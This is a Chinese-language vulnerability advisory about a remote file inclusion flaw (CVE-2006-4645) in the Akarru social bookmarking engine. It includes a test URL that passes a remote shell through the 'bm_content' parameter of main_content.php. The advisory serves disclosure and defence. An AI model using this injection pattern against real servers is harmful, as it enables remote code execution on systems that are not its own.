发布日期：2006-09-06
更新日期：2006-09-07

受影响系统：

sourceforge Akarru Social BookMarking Engine 4.3.34

描述：

---

BUGTRAQ  ID: 19870
CVE(CAN) ID: CVE-2006-4645

Akarru是个社交书签引擎，用于构建社交书签站点。

Akarru 0.4.3.34及其他版本存在安全漏洞，通过发送特制的URL请求到main_content.php脚本，使用'bm_content'参数指定远程系统内的恶意文件，可允许攻击者在服务器内执行任意代码。

<*来源：ERNE （erne@ernealizm.com）
  
  链接：http://xforce.iss.net/xforce/xfdb/28760
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://www.example.com/[path]/akarru.gui/main_content.php?bm_content=[shell]

建议：

---

厂商补丁：

sourceforge
-----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://sourceforge.net/projects/akarru/

浏览次数：2023
严重程度：0（网友投票）